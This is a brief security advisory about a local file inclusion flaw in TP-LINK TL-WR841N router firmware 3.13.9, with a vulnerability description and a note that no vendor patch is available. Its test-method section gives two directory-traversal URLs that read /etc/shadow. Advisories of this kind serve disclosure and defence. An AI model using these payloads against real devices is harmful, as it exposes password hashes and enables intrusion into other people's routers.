Release date:
Updated on: 2012-11-01
Affected Systems:
TP-LINK TL-WR841N 3.13.9
Description:
--------------------------------------------------------------------------------
Bugtraq id: 56320
TP-LINK TL-WR841N is a wireless router.
TP-LINK TL-WR841N 3.13.9 Build 120201 Rel.54965n and other versions have local file inclusion vulnerabilities that allow attackers to query files and execute local scripts on affected devices.
<* Source: Matan Azugi
*>
Test method:
--------------------------------------------------------------------------------
Alert
The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!
Http://www.example.com/../../../../../../../etc/shadow
Http://www.example.com/help/../../../../../../../../etc/shadow
Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
TP-LINK
-------
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:
Http://www.tp-link.com/products/